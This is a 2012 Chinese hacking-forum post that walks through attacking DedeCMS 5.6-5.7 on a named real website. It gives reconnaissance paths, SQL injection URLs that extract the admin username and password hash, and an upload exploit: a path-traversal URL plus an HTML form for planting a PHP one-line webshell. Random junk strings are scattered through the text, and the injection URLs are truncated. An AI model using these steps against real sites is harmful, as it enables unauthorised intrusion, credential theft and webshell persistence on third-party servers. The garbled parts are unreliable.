中国网络渗透测试联盟
标题:
dedecms5.6-5.7注入与上传漏洞利用
[打印本页]
作者:
admin
时间:
2012-9-13 10:56
标题:
dedecms5.6-5.7注入与上传漏洞利用
①注入漏洞。
- C' t& N' g$ O4 S4 S
这站
http://www.political-security.com/
2 o2 b; B: n k& }, V
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
) a( c0 Q' B8 s- W
www.political-security.com/data/mysql_error_trace.inc
爆后台
( a5 r0 D; ~2 [# A- k$ X7 o
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
3 J/ [8 b9 \) M
然后写上语句
& o5 S8 C. l, g1 b9 U
查看管理员帐号
z/ j1 z% ?7 U4 l" ^5 J
http://www.political-security.co ... &membergroup=@`
% @ X } e, d2 L5 h
? Q6 l. P2 y) V, k
admin
# H* y5 M0 ^' E* T- \
' q. `5 i1 O# q: t, w. e
查看管理员密码
% t/ z- k; Y3 `6 q6 a- F
http://www.political-security.co ... &membergroup=@`
0 e( e4 D1 ^6 Y4 f4 `4 U
7 ]& J+ K1 {: k# d0 b
8d29b1ef9f8c5a5af429
2 i! `7 P1 [ H/ i
' I# P( Q" |, r, z8 b8 u R4 p
查看管理员密码
T3 W% L" X( k8 [. T% `
$ g( e9 j4 O* ^6 U" J
得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5
' u% B* C6 T; `( k, H
& S, ~, A- v0 _) v
8d2
# L3 e E6 T4 `- J
9b1ef9f8c5a5af42
/ \0 y ^2 I. a8 N" r3 P
9
8 v8 N* ^# p' i* m$ o/ `
% \) q9 H' {$ H5 h
cmd5没解出来 只好测试第二个方法
7 m. s+ [4 d' T1 h& ~
+ t8 t4 |6 b. p
W( m/ f2 R* b+ G5 j. m8 X
②上传漏洞:
2 `, M+ I$ b% }" v- _
4 z. M# K% w. P/ I7 D
只要登陆会员中心,然后访问页面链接
& L2 y- O! m( \5 j8 }9 A# J2 [
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”
# h" W$ X+ v& S$ ?: Z- h/ h
4 t9 @" b+ s$ l# z1 l# ], w
如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”
& p0 H& K; \* S+ I+ _
0 W3 o* T3 ?1 l# _
于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
; j# ~- ?( B/ H3 C3 _* @
0 T, P& @) A9 i7 d
<form action="http://
www.political-security.com
/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>
6 ^6 C/ I2 \9 |- n
或者
8 m( c, t8 [" T" Y/ x& t/ e
即可上传成功
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2